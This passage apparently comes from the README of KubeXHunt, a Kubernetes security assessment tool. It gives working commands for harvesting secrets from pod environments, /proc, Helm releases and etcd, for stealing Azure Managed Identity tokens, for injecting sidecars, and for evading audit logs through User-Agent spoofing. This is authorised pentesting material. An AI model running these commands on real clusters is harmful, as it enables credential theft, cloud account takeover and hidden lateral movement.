            if any(kw in env.get('name', '').lower() for kw in cred_kw):
                print(f'πŸ”΄ {pod[\"metadata\"][\"name\"]}/{c[\"name\"]}: {env[\"name\"]}={str(env.get(\"value\",\"\"))[:60]}')
"

πŸ—„οΈ Phase 17: etcd Exposure ⭐

# Probe each node IP
for NODE_IP in $NODE_IPS; do
  # No TLS
  curl -s --max-time 4 http://$NODE_IP:2379/version 2>/dev/null | grep -q "etcdserver" && \
    echo "πŸ”΄ ETCD NO-TLS at $NODE_IP:2379 β€” DUMP ALL SECRETS" || true

  # HTTPS without client cert
  curl -sk --max-time 4 https://$NODE_IP:2379/version 2>/dev/null | grep -q "etcdserver" && \
    echo "πŸ”΄ ETCD HTTPS NO CLIENT CERT at $NODE_IP:2379" || \
    echo "βœ… etcd protected at $NODE_IP"
done

β›΅ Phase 18: Helm & Application Secrets ⭐

# Find and decode Helm release secrets (base64 + gzip)
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/secrets | \
  python3 -c "
import sys, json, base64, gzip, re
d = json.load(sys.stdin)
cred_pat = re.compile(r'(?:password|secret|token|apikey)\s*[:=]\s*[\"\'']?([^\s\"\'<>]{6,})', re.I)
for s in d.get('items', []):
    if s.get('type') == 'helm.sh/release.v1':
        raw = s.get('data', {}).get('release', '')
        if raw:
            try:
                raw2 = base64.b64decode(base64.b64decode(raw))
                content = gzip.decompress(raw2).decode(errors='replace')
                matches = cred_pat.findall(content)
                if matches:
                    print(f'πŸ”΄ Credentials in Helm release {s[\"metadata\"][\"name\"]}: {matches[:3]}')
            except Exception as e:
                pass
"

πŸ” Phase 19: /proc Credential Harvesting ⭐

# Two-phase scan: pod co-processes first, then host processes via hostPID
# Uses cgroup comparison to distinguish pod PIDs from host PIDs β€” prevents
# the same credential appearing twice when hostPID is enabled
python3 -c "
import os
cred_kw = ['password','secret','token','api_key','redis','database_url']
skip_kw = ['kubernetes','service_port','service_host','path','home','shell','term']

# Get our cgroup to identify the pod boundary
our_cgroup = open('/proc/self/cgroup').read().split('
')[0].split(':')[-1]
our_pid    = str(os.getpid())
pod_pids   = {our_pid}

print('=== Pod Co-Processes ===')
for pid in os.listdir('/proc'):
    if not pid.isdigit() or pid == our_pid: continue
    try:
        pid_cg = open(f'/proc/{pid}/cgroup').read().split('
')[0].split(':')[-1]
        comm   = open(f'/proc/{pid}/comm').read().strip()
        if pid_cg == our_cgroup:          # same cgroup = same pod
            pod_pids.add(pid)
            for ev in open(f'/proc/{pid}/environ').read().split(''):
                if '=' in ev:
                    k, _, v = ev.partition('=')
                    kl = k.lower()
                    if any(kw in kl for kw in cred_kw) and                        not any(sk in kl for sk in skip_kw) and v:
                        print(f'πŸ”΄ PID {pid} ({comm}): {k}={v[:60]}')
    except: pass

# Host processes β€” only if hostPID is enabled (PID 1 = systemd/init)
pid1 = open('/proc/1/comm').read().strip()
if pid1 in ('systemd','init'):
    print('
=== Host Processes (hostPID) ===')
    host_kw = ['kube','etcd','containerd','docker']
    for pid in os.listdir('/proc'):
        if not pid.isdigit() or pid in pod_pids: continue  # skip pod's own PIDs
        try:
            comm    = open(f'/proc/{pid}/comm').read().strip()
            cmdline = open(f'/proc/{pid}/cmdline').read().replace('',' ')
            if any(kw in comm.lower() or kw in cmdline.lower() for kw in host_kw):
                print(f'Host process: PID {pid} ({comm})')
                for ev in open(f'/proc/{pid}/environ').read().split(''):
                    if '=' in ev:
                        k, _, v = ev.partition('=')
                        kl = k.lower()
                        if any(kw in kl for kw in cred_kw) and                            not any(sk in kl for sk in skip_kw) and v:
                            print(f'  πŸ”΄ {k}={v[:60]}')
        except: pass
"

☁️ Phase 20: Azure AKS ⭐

# Azure IMDS
curl -s -H "Metadata: true" \
  "http://169.254.169.254/metadata/instance?api-version=2021-02-01" 2>/dev/null | python3 -m json.tool

# Managed Identity token theft
for resource in "https://management.azure.com/" "https://storage.azure.com/" "https://vault.azure.net/"; do
  curl -s -H "Metadata: true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=$resource" \
    2>/dev/null | python3 -c "
import sys, json
d = json.load(sys.stdin)
if 'access_token' in d:
    print(f'πŸ”΄ Managed Identity token for $resource β€” type: {d.get(\"token_type\")} | expires: {d.get(\"expires_in\")}s')
" 2>/dev/null
done

# Service Principal credentials
cat /etc/kubernetes/azure.json 2>/dev/null | python3 -c "
import sys, json
d = json.load(sys.stdin)
secret = d.get('aadClientSecret','') or d.get('clientSecret','')
if secret:
    print(f'πŸ”΄ SP Credentials: clientId={d.get(\"aadClientId\",\"\")} secret={secret[:8]}...')
" 2>/dev/null

πŸ”§ Phase 21: OpenShift / OKD ⭐

# SCC enumeration
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/apis/security.openshift.io/v1/securitycontextconstraints | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
dangerous = ['anyuid','privileged','hostmount-anyuid','hostaccess']
for s in d.get('items', []):
    name = s['metadata']['name']
    icon = 'πŸ”΄' if name in dangerous else 'πŸ”΅'
    print(f'{icon} SCC: {name}')
" 2>/dev/null

# OpenShift Routes
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/apis/route.openshift.io/v1/routes | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for r in d.get('items', []):
    host = r.get('spec',{}).get('host','')
    print(f'  β†’ {host}')
" 2>/dev/null

βš” Phase 22: Advanced Red Team Techniques ⭐

22.1 SA Token Audience Abuse

# Decode current token β€” check audience claim
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
python3 -c "
import base64, json, sys
parts = '$TOKEN'.split('.')
if len(parts) >= 2:
    payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
    aud = payload.get('aud', [])
    iss = payload.get('iss', '')
    exp = payload.get('exp', 0)
    print(f'aud: {aud}')
    print(f'iss: {iss}')
    print(f'No audience β†’ token replay risk' if not aud else 'βœ… Audience scoped')
"

22.2 Controller Hijacking (Sidecar Injection)

# Patch existing deployment to inject malicious sidecar
curl -sk -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json-patch+json" -X PATCH \
  $API/apis/apps/v1/namespaces/$NS/deployments/<DEPLOYMENT-NAME> \
  -d '[{
    "op": "add",
    "path": "/spec/template/spec/containers/-",
    "value": {
      "name": "assessment-sidecar",
      "image": "alpine",
      "command": ["sleep","3600"]
    }
  }]' | python3 -m json.tool

πŸ”— Phase 23: Real-World Attack Chain Simulation ⭐

KubeXHunt automatically validates all four chains based on findings from previous phases.

Chain CRITICAL if...
Pod β†’ IMDS β†’ Cloud Account SA token present AND cloud IMDS reachable
RBAC β†’ Privileged Pod β†’ Node Root Can list secrets AND can create privileged pods
Token Theft β†’ Wildcard RBAC β†’ Cluster Admin Stolen tokens found AND one has wildcard RBAC
Webhook Bypass β†’ Node Escape failurePolicy=Ignore AND webhook service unreachable

πŸ•΅οΈ Phase 24: Stealth & Evasion Analysis ⭐

# Run with maximum stealth β€” blends into normal kubectl traffic
python3 kubexhunt.py --stealth 2 --no-mutate

# What stealth level 2 does:
# - User-Agent: kubectl/v1.29.0 (linux/amd64) kubernetes/v1.29.0
# - Timing jitter: 0.5–3.5s between API calls
# - Read-only: all capabilities inferred from RBAC, no test resources created
# - Batched: parallel checks minimized
# - Result: zero mutating audit log entries, traffic looks like normal kubectl usage

# Verify --no-mutate produces PASS (not HIGH) for the mutating API calls finding
python3 kubexhunt.py --no-mutate --phase 24 --no-color 2>/dev/null | grep -A2 "Mutating API"
# Expected: βœ… PASS  Mutating API calls skipped (--no-mutate active)
#           Zero write operations in audit log

# Verify stealth level is reflected correctly
python3 kubexhunt.py --stealth 1 --phase 24 --no-color 2>/dev/null | grep -A2 "Stealth"
# Expected: βœ… PASS  Stealth level 1 active
#           kubectl User-Agent spoofing | Timing jitter (0.3–2s)

🌐 Phase 25: Network Plugin & Misc ⭐

# Detect CNI
for cni_path in /etc/cni/net.d/10-calico.conflist /etc/cni/net.d/05-cilium.conf \
                /etc/cni/net.d/10-weave.conf /etc/cni/net.d/10-flannel.conf; do
  [ -f "$cni_path" ] && echo "CNI: $(basename $cni_path | sed 's/[0-9]*-//;s/\..*$//')"
done

# Cluster-wide automount audit
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/pods | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
over_mounted = [f'{p[\"metadata\"][\"namespace\"]}/{p[\"metadata\"][\"name\"]}' for p in d.get('items',[])
                if p.get('spec',{}).get('automountServiceAccountToken') != False]
print(f'🟑 {len(over_mounted)} pods auto-mount SA tokens (should be explicit False)')
"

πŸ”„ Phase 26: Diff & CI/CD Reporting ⭐

# Generate baseline
python3 kubexhunt.py --output baseline.json

# After infrastructure change β€” compare
python3 kubexhunt.py --diff baseline.json --output rescan.json
# Exits code 1 if new CRITICAL or HIGH found

# In CI/CD pipeline (GitLab/GitHub Actions example)
python3 kubexhunt.py \
  --stealth 2 \
  --no-mutate \
  --diff previous-scan.json \
  --output "$CI_JOB_NAME-$(date +%Y%m%d).json" || exit 1

πŸ“ Findings Summary Template

## Finding: [Title]

**Severity:** πŸ”΄ Critical / 🟠 High / 🟑 Medium / πŸ”΅ Low
**Category:** Cloud Credentials | RBAC | Container Escape | Lateral Movement | Runtime | Supply Chain

**Evidence:**
\`\`\`
<paste command output here>
\`\`\`

**Impact:**
<What can an attacker achieve with this finding>

**Steps to Reproduce:**
1. Starting from compromised pod in namespace `<ns>`
2. Run: `<command>`
3. Observe: `<output>`

**Remediation:**
- [ ] <specific fix>
- [ ] <specific fix>

**References:**
- MITRE ATT&CK: [T1552.007](https://attack.mitre.org/techniques/T1552/007/) Container Credentials

πŸ“Š Severity Matrix

Finding Severity Immediate Impact
IMDS accessible + IAM credentials stolen πŸ”΄ Critical AWS/GCP/Azure account takeover
etcd accessible without auth πŸ”΄ Critical All cluster secrets in plaintext
Privileged pod + hostPath mount πŸ”΄ Critical Full node + cluster compromise
aws-auth / ClusterRoleBinding writable πŸ”΄ Critical Permanent cluster-admin
Kubelet 10255/10250 anonymous access πŸ”΄ Critical All pod credentials harvested
Attack chain simulation β€” any complete chain πŸ”΄ Critical End-to-end cluster or cloud compromise
Wildcard RBAC on service account 🟠 High All secrets in cluster readable
Other pods' SA tokens readable via hostPath 🟠 High Lateral movement to any workload
Kubelet certificate accessible 🟠 High system:node credential
Helm release secrets with embedded credentials 🟠 High Application credentials exposed
Unsigned images allowed in admission 🟠 High Supply chain backdoor vector
failurePolicy: Ignore on Kyverno webhook 🟠 High All admission policies bypassable
Azure Managed Identity / SP credentials 🟠 High Azure subscription access
OpenShift anyuid/privileged SCC 🟠 High Container escape equivalent
No mTLS between services 🟑 Medium Traffic sniffing, PII exposure
No Tetragon/Falco runtime security 🟑 Medium Reverse shells, crypto mining go undetected
Flat network (no NetworkPolicy) 🟑 Medium Unrestricted lateral movement
PSS not enforced on namespace 🟑 Medium Container escape vector open
cluster-wide automountServiceAccountToken 🟑 Medium Every pod a K8s API auth point
API server on public IP πŸ”΄ Critical Internet-exposed K8s API β€” brute-force / CVE exploitation risk
Worker nodes with public IPs 🟠 High Kubelet 10250 / NodePort services exposed to internet
Registry credential catalog pivot 🟠 High Pull/push private images β€” supply chain backdoor possible
Missing resource limits πŸ”΅ Low Node DoS / noisy neighbour
No audit logging πŸ”΅ Low No forensic trail for incidents

☁️ EKS vs GKE vs Azure vs OpenShift

Check EKS GKE Azure AKS OpenShift
Metadata endpoint 169.254.169.254 metadata.google.internal 169.254.169.254 N/A
Node IAM EC2 instance role GCE service account Managed Identity / SP N/A
K8s auth mapping aws-auth ConfigMap GKE IAM β†’ K8s RBAC AAD β†’ K8s RBAC OAuth + SCC
Pod-level cloud auth IRSA Workload Identity Workload Identity / AAD Pod Identity N/A
Audit logs CloudWatch Cloud Logging Azure Monitor OpenShift Audit
Default CNI Amazon VPC CNI Cilium Azure CNI OVN-Kubernetes
Container policy PSS + Kyverno PSS + Binary Auth PSS + Azure Policy SCC (SecurityContextConstraints)
etcd access Fully managed Fully managed Fully managed Managed (self-hosted possible)
Legacy metadata IMDSv1 (disable explicitly) v1beta1 (off since GKE 1.21) β€” N/A
Unique attack surface aws-auth write cloud-platform scope azure.json / SP creds anyuid SCC assignment

🎯 Use Cases

  • πŸ”΄ Red Team / Pentesting
    Simulate real attacker behavior inside compromised pods

  • πŸ”΅ Blue Team / Detection Engineering
    Validate detection coverage and audit logging

  • 🟒 DevSecOps / Platform Teams
    Identify real-world impact of misconfigurations

  • 🟣 CI/CD Security Gates
    Fail builds on newly introduced critical risks


All test cases require written authorisation before execution. Document every command run, every output captured, and all cleanup actions taken.

MITRE ATT&CK License Version

About

KubeXHunt is a Kubernetes security assessment tool designed for penetration testers and security engineers to evaluate cluster misconfigurations and potential attack paths from within a compromised pod, providing clear pass/fail results for each security check.

Resources

License

Stars

Watchers

Forks

Packages

 
 
 

Contributors